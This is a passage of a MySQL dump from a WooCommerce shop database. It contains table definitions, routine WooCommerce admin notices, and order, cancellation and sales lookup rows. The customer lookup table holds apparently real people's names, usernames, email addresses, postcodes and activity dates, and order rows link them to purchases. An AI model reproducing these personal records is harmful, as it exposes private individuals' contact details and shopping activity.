08:53:50',NULL,0,'plain','',0,0,'info'),(205,'WooCommerce-Stripe-Gateway-Update-Info-April-2025','update','en_US','WooCommerce Stripe Gateway has been updated to v9.4.1','<strong>WooCommerce Stripe Payment Gateway was recently updated</strong>. Version 9.4.1 addresses performance issues and payment method visibility problems that occurred in version 9.4.0. No further action is required. Please read <a href=\"https://developer.woocommerce.com/2025/04/18/https://developer.woocommerce.com/2025/04/18/developer-advisory-stripe-payment-gateway-9-4-1-release/\" /> this advisory post </a>for more information.','{}','pending','woocommerce.com','2025-04-19 08:53:50',NULL,0,'plain','',0,0,'info'),(206,'klaviyo_q2_2025','marketing','en_US','Tailor your marketing with data-driven automation','Deliver personalized experiences at scale, simplify your stack, and make your data work for you using Klaviyo’s best-in-class marketing extension for Woo. With advanced segmentation based on actual customer behavior, you can send email and SMS messages that drive revenue and increase loyalty — without adding complexity','{}','pending','woocommerce.com','2025-04-30 07:46:19',NULL,0,'plain','',0,0,'info'),(207,'uk-vat-notice-2025-04-30','warning','en_US','UK VAT numbers are no longer supported','Due to recent HM Revenue &amp; Customs (HMRC) VAT API changes, your EU VAT Number for WooCommerce extension can no longer validate UK VAT numbers. HMRC now requires merchants to register an API key, which this extension does not currently support. We recommend EU/UK VAT Validation Manager for WooCommerce as a replacement','{}','pending','woocommerce.com','2025-05-05 07:51:46',NULL,0,'plain','',0,0,'info'),(208,'payson-retirement-2025','update','en_US','Payson Form Retirement','Svea Bank is discontinuing the Payson service; the last date for transactions is August 31, 2025. As a result, the Payson Form extension has been removed from WooCommerce.com. Documentation remains available.','{}','pending','woocommerce.com','2025-05-13 08:15:19',NULL,0,'plain','',0,0,'info');
/*!40000 ALTER TABLE `wp_wc_admin_notes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_cancel_orders`
--

DROP TABLE IF EXISTS `wp_wc_cancel_orders`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_cancel_orders` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `order_id` bigint(20) NOT NULL,
  `user_id` bigint(20) NOT NULL,
  `is_approved` tinyint(2) NOT NULL DEFAULT 0,
  `cancel_request_date` timestamp NOT NULL DEFAULT current_timestamp(),
  `cancel_date` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_cancel_orders`
--

LOCK TABLES `wp_wc_cancel_orders` WRITE;
/*!40000 ALTER TABLE `wp_wc_cancel_orders` DISABLE KEYS */;
INSERT INTO `wp_wc_cancel_orders` VALUES (1,654,1,0,'2022-02-25 06:11:25','0000-00-00 00:00:00'),(2,1008,21,0,'2022-02-25 06:33:04','0000-00-00 00:00:00'),(3,1013,21,0,'2022-02-25 06:35:00','0000-00-00 00:00:00'),(4,1017,21,0,'2022-03-03 05:05:40','0000-00-00 00:00:00'),(5,1023,21,0,'2022-03-03 05:37:48','0000-00-00 00:00:00');
/*!40000 ALTER TABLE `wp_wc_cancel_orders` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_category_lookup`
--

DROP TABLE IF EXISTS `wp_wc_category_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_category_lookup` (
  `category_tree_id` bigint(20) unsigned NOT NULL,
  `category_id` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`category_tree_id`,`category_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_category_lookup`
--

LOCK TABLES `wp_wc_category_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_category_lookup` DISABLE KEYS */;
INSERT INTO `wp_wc_category_lookup` VALUES (15,15),(76,76),(78,78),(79,79),(80,80),(133,133),(134,134),(135,135),(136,136);
/*!40000 ALTER TABLE `wp_wc_category_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_customer_lookup`
--

DROP TABLE IF EXISTS `wp_wc_customer_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_customer_lookup` (
  `customer_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `username` varchar(60) NOT NULL DEFAULT '',
  `first_name` varchar(255) NOT NULL,
  `last_name` varchar(255) NOT NULL,
  `email` varchar(100) DEFAULT NULL,
  `date_last_active` timestamp NULL DEFAULT NULL,
  `date_registered` timestamp NULL DEFAULT NULL,
  `country` char(2) NOT NULL DEFAULT '',
  `postcode` varchar(20) NOT NULL DEFAULT '',
  `city` varchar(100) NOT NULL DEFAULT '',
  `state` varchar(100) NOT NULL DEFAULT '',
  PRIMARY KEY (`customer_id`),
  UNIQUE KEY `user_id` (`user_id`),
  KEY `email` (`email`)
) ENGINE=InnoDB AUTO_INCREMENT=18 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_customer_lookup`
--

LOCK TABLES `wp_wc_customer_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_customer_lookup` DISABLE KEYS */;
INSERT INTO `wp_wc_customer_lookup` VALUES (1,1,'sitemanager','admin','p','mango@homedirect.in','2022-10-27 22:38:19','2022-01-24 01:49:21','IN','560078','bangalore','KA'),(2,13,'1234','','','1234@gmail.com','2022-02-14 00:00:00','2022-02-09 04:25:24','','','',''),(3,NULL,'','pavithra','g','pavitra@utfindia.in','2022-02-22 05:57:12',NULL,'IN','560102','bangalore','KA'),(4,21,'bhavani','','','bhavani@utfindia.in','2022-03-03 00:02:37','2022-02-23 23:39:52','IN','560102','bangalore','KA'),(5,20,'Pavitra','pavithra','g','Pavitra@utfindia.in','2022-02-24 04:37:15','2022-02-23 06:40:13','IN','560102','bangalore','KA'),(6,26,'nijo101196','bavani','p','nijo101196@gmail.com','2022-03-07 04:04:34','2022-03-07 00:46:33','IN','560102','bangalore','KA'),(7,29,'utfhr.333','pavithra','g','utfhr.333@gmail.com','2022-03-15 02:32:38','2022-03-15 02:10:31','IN','560102','bangalore','KA'),(8,NULL,'','pavithra','g','pggg1507@gmail.com','2022-11-22 01:24:40',NULL,'IN','560102','bangalore','KA'),(9,33,'Pavi','Pavithra','M','Pavim123@gmail.com','2023-07-17 18:30:00','2023-07-17 23:54:49','','','',''),(10,36,'donalddalton808','','','DonaldDalton808@gmail.com','2024-10-11 18:30:00','2024-10-12 03:20:25','','','',''),(11,37,'lauragarcia808','','','LauraGarcia808@gmail.com','2024-10-16 18:30:00','2024-10-17 04:45:59','','','',''),(12,38,'jefferymarshall808','','','JefferyMarshall808@gmail.com','2024-10-17 18:30:00','2024-10-17 23:04:45','','','',''),(13,39,'melissawyatt808','','','MelissaWyatt808@gmail.com','2024-10-22 18:30:00','2024-10-23 04:54:14','','','',''),(14,40,'christinewright808','','','ChristineWright808@gmail.com','2024-10-24 18:30:00','2024-10-25 05:25:32','','','',''),(15,41,'anthonymiller808','','','anthonymiller808@gmail.com','2024-12-05 18:30:00','2024-12-06 05:57:53','','','',''),(16,42,'bikash.parida1992','Bikash Ranjan','Parida','bikash.parida1992@gmail.com','2025-01-26 18:30:00','2025-01-27 01:57:15','','','',''),(17,43,'hjain7446','','','hjain7446@gmail.com','2025-02-26 18:30:00','2025-02-27 10:05:58','','','','');
/*!40000 ALTER TABLE `wp_wc_customer_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_download_log`
--

DROP TABLE IF EXISTS `wp_wc_download_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_download_log` (
  `download_log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `timestamp` datetime NOT NULL,
  `permission_id` bigint(20) unsigned NOT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `user_ip_address` varchar(100) DEFAULT '',
  PRIMARY KEY (`download_log_id`),
  KEY `permission_id` (`permission_id`),
  KEY `timestamp` (`timestamp`),
  CONSTRAINT `fk_wp_wc_download_log_permission_id` FOREIGN KEY (`permission_id`) REFERENCES `wp_woocommerce_downloadable_product_permissions` (`permission_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_download_log`
--

LOCK TABLES `wp_wc_download_log` WRITE;
/*!40000 ALTER TABLE `wp_wc_download_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_download_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_order_addresses`
--

DROP TABLE IF EXISTS `wp_wc_order_addresses`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_order_addresses` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `order_id` bigint(20) unsigned NOT NULL,
  `address_type` varchar(20) DEFAULT NULL,
  `first_name` text DEFAULT NULL,
  `last_name` text DEFAULT NULL,
  `company` text DEFAULT NULL,
  `address_1` text DEFAULT NULL,
  `address_2` text DEFAULT NULL,
  `city` text DEFAULT NULL,
  `state` text DEFAULT NULL,
  `postcode` text DEFAULT NULL,
  `country` text DEFAULT NULL,
  `email` varchar(320) DEFAULT NULL,
  `phone` varchar(100) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `address_type_order_id` (`address_type`,`order_id`),
  KEY `order_id` (`order_id`),
  KEY `email` (`email`),
  KEY `phone` (`phone`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_order_addresses`
--

LOCK TABLES `wp_wc_order_addresses` WRITE;
/*!40000 ALTER TABLE `wp_wc_order_addresses` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_order_addresses` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_order_coupon_lookup`
--

DROP TABLE IF EXISTS `wp_wc_order_coupon_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_order_coupon_lookup` (
  `order_id` bigint(20) unsigned NOT NULL,
  `coupon_id` bigint(20) NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `discount_amount` double NOT NULL DEFAULT 0,
  PRIMARY KEY (`order_id`,`coupon_id`),
  KEY `coupon_id` (`coupon_id`),
  KEY `date_created` (`date_created`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_order_coupon_lookup`
--

LOCK TABLES `wp_wc_order_coupon_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_order_coupon_lookup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_order_coupon_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_order_operational_data`
--

DROP TABLE IF EXISTS `wp_wc_order_operational_data`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_order_operational_data` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `order_id` bigint(20) unsigned DEFAULT NULL,
  `created_via` varchar(100) DEFAULT NULL,
  `woocommerce_version` varchar(20) DEFAULT NULL,
  `prices_include_tax` tinyint(1) DEFAULT NULL,
  `coupon_usages_are_counted` tinyint(1) DEFAULT NULL,
  `download_permission_granted` tinyint(1) DEFAULT NULL,
  `cart_hash` varchar(100) DEFAULT NULL,
  `new_order_email_sent` tinyint(1) DEFAULT NULL,
  `order_key` varchar(100) DEFAULT NULL,
  `order_stock_reduced` tinyint(1) DEFAULT NULL,
  `date_paid_gmt` datetime DEFAULT NULL,
  `date_completed_gmt` datetime DEFAULT NULL,
  `shipping_tax_amount` decimal(26,8) DEFAULT NULL,
  `shipping_total_amount` decimal(26,8) DEFAULT NULL,
  `discount_tax_amount` decimal(26,8) DEFAULT NULL,
  `discount_total_amount` decimal(26,8) DEFAULT NULL,
  `recorded_sales` tinyint(1) DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `order_id` (`order_id`),
  KEY `order_key` (`order_key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_order_operational_data`
--

LOCK TABLES `wp_wc_order_operational_data` WRITE;
/*!40000 ALTER TABLE `wp_wc_order_operational_data` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_order_operational_data` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_order_product_lookup`
--

DROP TABLE IF EXISTS `wp_wc_order_product_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_order_product_lookup` (
  `order_item_id` bigint(20) unsigned NOT NULL,
  `order_id` bigint(20) unsigned NOT NULL,
  `product_id` bigint(20) unsigned NOT NULL,
  `variation_id` bigint(20) unsigned NOT NULL,
  `customer_id` bigint(20) unsigned DEFAULT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `product_qty` int(11) NOT NULL,
  `product_net_revenue` double NOT NULL DEFAULT 0,
  `product_gross_revenue` double NOT NULL DEFAULT 0,
  `coupon_amount` double NOT NULL DEFAULT 0,
  `tax_amount` double NOT NULL DEFAULT 0,
  `shipping_amount` double NOT NULL DEFAULT 0,
  `shipping_tax_amount` double NOT NULL DEFAULT 0,
  PRIMARY KEY (`order_item_id`),
  KEY `order_id` (`order_id`),
  KEY `product_id` (`product_id`),
  KEY `customer_id` (`customer_id`),
  KEY `date_created` (`date_created`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_order_product_lookup`
--

LOCK TABLES `wp_wc_order_product_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_order_product_lookup` DISABLE KEYS */;
INSERT INTO `wp_wc_order_product_lookup` VALUES (1,580,543,0,1,'2022-01-25 03:56:26',1,220,220,0,0,0,0),(3,581,543,0,1,'2022-01-25 03:56:26',1,220,220,0,0,0,0),(5,654,542,0,1,'2022-01-31 16:01:44',1,220,220,0,0,0,0),(6,654,596,0,1,'2022-01-31 16:01:44',1,0,0,0,0,0,0),(8,998,539,0,3,'2022-02-22 16:57:12',1,200,200,0,0,0,0),(10,1002,1000,0,4,'2022-02-24 10:41:57',1,400,425,0,0,25,0),(12,1005,530,0,5,'2022-02-24 15:37:15',1,110,135,0,0,25,0),(13,1005,1004,0,5,'2022-02-24 15:37:15',1,222,247,0,0,25,0),(16,1008,1004,0,4,'2022-02-25 09:33:41',1,222,247,0,0,25,0),(17,1008,596,0,4,'2022-02-25 09:33:41',1,46,71,0,0,25,0),(20,1012,532,0,4,'2022-02-25 11:07:47',2,280,280,0,0,0,0),(21,1012,1000,0,4,'2022-02-25 11:07:47',1,400,400,0,0,0,0),(24,1013,532,0,4,'2022-02-25 12:04:22',1,140,165,0,0,25,0),(40,1016,534,0,4,'2022-02-25 16:39:01',1,160,166.25,0,0,6.25,0),(41,1016,1001,0,4,'2022-02-25 16:39:01',1,500,506.25,0,0,6.25,0),(42,1016,1004,0,4,'2022-02-25 16:39:01',1,222,228.25,0,0,6.25,0),(43,1016,1000,0,4,'2022-02-25 16:39:01',1,400,406.25,0,0,6.25,0),(47,1017,1000,0,4,'2022-02-25 16:54:49',1,400,400,0,0,0,0),(48,1017,1004,0,4,'2022-02-25 16:54:49',1,222,222,0,0,0,0),(49,1017,537,0,4,'2022-02-25 16:54:49',1,110,110,0,0,0,0),(53,1018,1004,0,4,'2022-03-03 10:34:03',1,222,222,0,0,0,0),(55,1022,1020,0,4,'2022-03-03 10:56:23',1,123,135.5,0,0,12.5,0),(56,1022,536,0,4,'2022-03-03 10:56:23',1,180,192.5,0,0,12.5,0),(59,1023,590,0,4,'2022-03-03 11:02:37',1,80,105,0,0,25,0),(60,1023,1020,0,4,'2022-03-03 11:02:37',1,123,148,0,0,25,0),(63,1195,1194,0,6,'2022-03-07 11:54:06',1,100,120,0,0,20,0),(64,1195,1159,0,6,'2022-03-07 11:54:06',1,95,115,0,0,20,0),(67,1196,1159,0,1,'2022-03-07 12:36:45',2,190,206,0,0,16,0),(68,1196,1163,0,1,'2022-03-07 12:36:45',2,190,206,0,0,16,0),(69,1196,1194,0,1,'2022-03-07 12:36:45',1,100,108,0,0,8,0),(72,1197,1069,0,1,'2022-03-07 12:48:14',1,499,519,0,0,20,0),(74,1198,1165,0,6,'2022-03-07 12:50:37',1,95,105,0,0,10,0),(75,1198,1107,0,6,'2022-03-07 12:50:37',1,38,48,0,0,10,0),(77,1199,1165,0,6,'2022-03-07 12:53:04',1,95,115,0,0,20,0),(78,1199,1194,0,6,'2022-03-07 12:53:04',1,100,120,0,0,20,0),(81,1200,1194,0,6,'2022-03-07 13:04:47',1,100,120,0,0,20,0),(83,1201,1194,0,6,'2022-03-07 15:04:34',1,100,105,0,0,5,0),(84,1201,1159,0,6,'2022-03-07 15:04:34',1,95,100,0,0,5,0),(91,1202,1194,0,1,'2022-03-07 15:45:25',1,100,105,0,0,5,0),(92,1202,1116,0,1,'2022-03-07 15:45:25',1,499,504,0,0,5,0),(99,1277,1276,0,7,'2022-03-15 13:14:38',1,598,598,0,0,0,0),(101,1278,1276,0,7,'2022-03-15 13:20:57',1,598,598,0,0,0,0),(102,1278,1194,0,7,'2022-03-15 13:20:57',1,999,999,0,0,0,0),(105,1279,1194,0,7,'2022-03-15 13:28:20',1,999,1029,0,0,30,0),(107,1280,1194,0,7,'2022-03-15 13:32:38',1,999,1029,0,0,30,0),(121,1988,1786,0,1,'2022-10-27 17:35:26',1,21000,21000,0,0,0,0),(122,1988,1775,0,1,'2022-10-27 17:35:26',1,21000,21000,0,0,0,0),(124,1989,1775,0,1,'2022-10-28 09:38:19',1,21000,21000,0,0,0,0),(126,2032,1775,0,8,'2022-11-22 12:24:40',1,21000,21000,0,0,0,0);
/*!40000 ALTER TABLE `wp_wc_order_product_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_order_stats`
--

DROP TABLE IF EXISTS `wp_wc_order_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_order_stats` (
  `order_id` bigint(20) unsigned NOT NULL,
  `parent_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `num_items_sold` int(11) NOT NULL DEFAULT 0,
  `total_sales` double NOT NULL DEFAULT 0,
  `tax_total` double NOT NULL DEFAULT 0,
  `shipping_total` double NOT NULL DEFAULT 0,
  `net_total` double NOT NULL DEFAULT 0,
  `returning_customer` tinyint(1) DEFAULT NULL,
  `status` varchar(200) NOT NULL,
  `customer_id` bigint(20) unsigned NOT NULL,
  `date_paid` datetime DEFAULT '0000-00-00 00:00:00',
  `date_completed` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`order_id`),
  KEY `date_created` (`date_created`),
  KEY `customer_id` (`customer_id`),
  KEY `status` (`status`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_order_stats`
--

LOCK TABLES `wp_wc_order_stats` WRITE;
/*!40000 ALTER TABLE `wp_wc_order_stats` DISABLE KEYS */;
INSERT INTO `wp_wc_order_stats` VALUES (580,0,'2022-01-25 03:56:26','2022-01-25 03:56:26',1,220,0,0,220,0,'wc-processing',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(654,0,'2022-01-31 16:01:44','2022-01-31 10:31:44',2,220,0,0,220,1,'wc-cancel-request',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(998,0,'2022-02-22 16:57:12','2022-02-22 11:27:12',1,200,0,0,200,0,'wc-processing',3,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1002,0,'2022-02-24 10:41:57','2022-02-24 05:11:57',1,425,0,25,400,0,'wc-completed',4,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1005,0,'2022-02-24 15:37:15','2022-02-24 10:07:15',2,382,0,50,332,0,'wc-processing',5,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1008,0,'2022-02-25 09:33:41','2022-02-25 04:03:41',2,318,0,50,268,1,'wc-cancel-request',4,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1012,0,'2022-02-25 11:07:47','2022-02-25 05:37:47',3,680,0,0,680,1,'wc-completed',4,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1013,0,'2022-02-25 12:04:22','2022-02-25 06:34:22',1,165,0,25,140,1,'wc-cancelled',4,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1016,0,'2022-02-25 16:39:01','2022-02-25 11:09:01',4,1307,0,25,1282,1,'wc-completed',4,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1017,0,'2022-02-25 16:54:49','2022-02-25 11:24:49',3,732,0,0,732,1,'wc-cancelled',4,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1018,0,'2022-03-03 10:34:03','2022-03-03 05:04:03',1,222,0,0,222,1,'wc-completed',4,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1022,0,'2022-03-03 10:56:23','2022-03-03 05:26:23',2,328,0,25,303,1,'wc-completed',4,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1023,0,'2022-03-03 11:02:37','2022-03-03 05:32:37',2,253,0,50,203,1,'wc-cancel-request',4,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1195,0,'2022-03-07 11:54:06','2022-03-07 06:24:06',2,235,0,40,195,0,'wc-completed',6,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1196,0,'2022-03-07 12:36:45','2022-03-07 07:06:45',5,520,0,40,480,1,'wc-processing',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1197,0,'2022-03-07 12:48:14','2022-03-07 07:18:14',1,519,0,20,499,1,'wc-processing',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1198,0,'2022-03-07 12:50:37','2022-03-07 07:20:37',2,153,0,20,133,1,'wc-processing',6,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1199,0,'2022-03-07 12:53:04','2022-03-07 07:23:04',2,235,0,40,195,1,'wc-processing',6,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1200,0,'2022-03-07 13:04:47','2022-03-07 07:34:47',1,120,0,20,100,1,'wc-processing',6,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1201,0,'2022-03-07 15:04:34','2022-03-07 09:34:34',2,205,0,10,195,1,'wc-processing',6,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1202,0,'2022-03-07 15:45:25','2022-03-07 10:15:25',2,609,0,10,599,1,'wc-cancelled',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1277,0,'2022-03-15 13:14:38','2022-03-15 07:44:38',1,598,0,0,598,0,'wc-completed',7,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1278,0,'2022-03-15 13:20:57','2022-03-15 07:50:57',2,1597,0,0,1597,1,'wc-processing',7,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1279,0,'2022-03-15 13:28:20','2022-03-15 07:58:20',1,1029,0,30,999,1,'wc-completed',7,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1280,0,'2022-03-15 13:32:38','2022-03-15 08:02:38',1,1029,0,30,999,1,'wc-processing',7,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1988,0,'2022-10-27 17:35:26','2022-10-27 12:05:26',2,42000,0,0,42000,1,'wc-processing',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(1989,0,'2022-10-28 09:38:19','2022-10-28 04:08:19',1,21000,0,0,21000,1,'wc-processing',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'),(2032,0,'2022-11-22 12:24:40','2022-11-22 06:54:40',1,21000,0,0,21000,0,'wc-processing',8,'0000-00-00 00:00:00','0000-00-00 00:00:00');
/*!40000 ALTER TABLE `wp_wc_order_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_order_tax_lookup`
--

DROP TABLE IF EXISTS `wp_wc_order_tax_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_order_tax_lookup` (
  `order_id` bigint(20) unsigned NOT NULL,
  `tax_rate_id` bigint(20) unsigned NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `shipping_tax` double NOT NULL DEFAULT 0,
  `order_tax` double NOT NULL DEFAULT 0,
  `total_tax` double NOT NULL DEFAULT 0,
  PRIMARY KEY (`order_id`,`tax_rate_id`),
  KEY `tax_rate_id` (`tax_rate_id`),
  KEY `date_created` (`date_created`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_order_tax_lookup`
--

LOCK TABLES `wp_wc_order_tax_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_order_tax_lookup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_order_tax_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_orders`
--

DROP TABLE IF EXISTS `wp_wc_orders`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_orders` (
  `id` bigint(20) unsigned NOT NULL,
  `status` varchar(20) DEFAULT NULL,
  `currency` varchar(10) DEFAULT NULL,
  `type` varchar(20) DEFAULT NULL,
  `tax_amount` decimal(26,8) DEFAULT NULL,
  `total_amount` decimal(26,8) DEFAULT NULL,
  `customer_id` bigint(20) unsigned DEFAULT NULL,
  `billing_email` varchar(320) DEFAULT NULL,
  `date_created_gmt` datetime DEFAULT NULL,
  `date_updated_gmt` datetime DEFAULT NULL,
  `parent_order_id` bigint(20) unsigned DEFAULT NULL,
  `payment_method` varchar(100) DEFAULT NULL,
  `payment_method_title` text DEFAULT NULL,
  `transaction_id` varchar(100) DEFAULT NULL,
  `ip_address` varchar(100) DEFAULT NULL,
  `user_agent` text DEFAULT NULL,
  `customer_note` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `status` (`status`),
  KEY `date_created` (`date_created_gmt`),
  KEY `customer_id_billing_email` (`customer_id`,`billing_email`),
  KEY `billing_email` (`billing_email`),
  KEY `type_status` (`type`,`status`),
  KEY `parent_order_id` (`parent_order_id`),
  KEY `date_updated` (`date_updated_gmt`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_orders`
--

LOCK TABLES `wp_wc_orders` WRITE;
/*!40000 ALTER TABLE `wp_wc_orders` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_orders` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_orders_meta`
--

DROP TABLE IF EXISTS `wp_wc_orders_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_orders_meta` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `order_id` bigint(20) unsigned DEFAULT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `meta_key_value` (`meta_key`,`meta_value`(100)),
  KEY `order_id_meta_key_meta_value` (`order_id`,`meta_key`,`meta_value`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_orders_meta`
--

LOCK TABLES `wp_wc_orders_meta` WRITE;
/*!40000 ALTER TABLE `wp_wc_orders_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_orders_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_product_attributes_lookup`
--

DROP TABLE IF EXISTS `wp_wc_product_attributes_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
